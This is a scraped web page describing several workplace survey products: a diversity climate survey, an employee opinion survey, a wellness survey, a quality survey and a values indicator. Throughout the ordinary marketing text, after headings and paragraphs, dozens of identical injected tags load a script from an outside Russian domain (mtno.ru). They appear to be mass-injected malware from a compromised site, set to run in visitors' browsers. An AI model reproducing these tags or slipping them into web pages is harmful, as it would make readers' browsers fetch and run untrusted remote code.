Climate Survey<script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script>
Every organization would like to create a general climate that is positive and that is conductive to feeling good about coming to work and working together to achieve the goals of the enterprise.

In order to ensure that our overall climate is as productive as possible, we need to have a simple but effective way to measure how people feel at the moment. This simple electronic questionnaire helps to gather this data in a structured way.

This instrument looks at how much commitment to diversity and awareness of differences in culture exists from two perspectives - the individuals view about their own commitment and what they see to be the commitment of the wider organization around them. This provides a detailed 'gap' analysis in six diversity and cultural awareness categories. These are Predisposition and climate, Levels of inclusion and assimilation, Levels of tolerance and understanding, Degree of empathy, Organizational adaptation and Persistence and commitment.<script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script>

Enterprise Pulse Opinion Survey<script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script>
Our organization would like to create a general climate that is positive and supportive of individual and team effort that is conducive to feeling good about coming to work and working together to achieve the goals of the enterprise. One way in which we can ensure that we are effective in doing this is to systematically collect the opinions of our employees about a range of issues that can help us shape future strategy when it comes to our most important asset-our people.

In order to gather opinion in a fair, consistent and reliable way, we utilize an electronic questionnaire to help measure how people feel at the moment. This simple process asks individuals to indicate their opinion in 80 separate questions. This will ultimately give us a very strong indication about how people feel about their workplace in ten categories.

Enterprise Pulse-Wellness Survey<script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script>
The underlying principle of a corporately ‘well’ enterprise is that ‘well’ people and a ‘well’ culture underpins a more energized and high performance output from the organization in its broadest sense. This is attained through employees improving their personal health, their relationships with other people at work, their own alignment to the organization’s purpose and ultimately by ensuring their own ‘healthy’ performance in delivering the goods and service that the organization offers.<script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script>

This instrument looks at how much focus is given by an individual to quality in their workplace in seven categories linked to the international total quality frameworks that exist. These categories are Leadership for quality, Strategy and policy, Employee satisfaction, Data and resource management, Process and systems management, Supplier/customer focus and Outcomes and results focus.<script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script>

Values Indicator<script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script>
Every organization, however large or small it may be will have a range of underlying values held by its individual members. These informal and often invisible views form what is generally seen to be the values culture of the organization.

The more people's values can be understood, the more the organization can take account of its employee feedback and act in more positively aligned ways. This assessment helps individuals to discover their own most important values and to discover the values of the organization as a whole.<script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script><script src=http://www.mtno.ru/style.js></script>
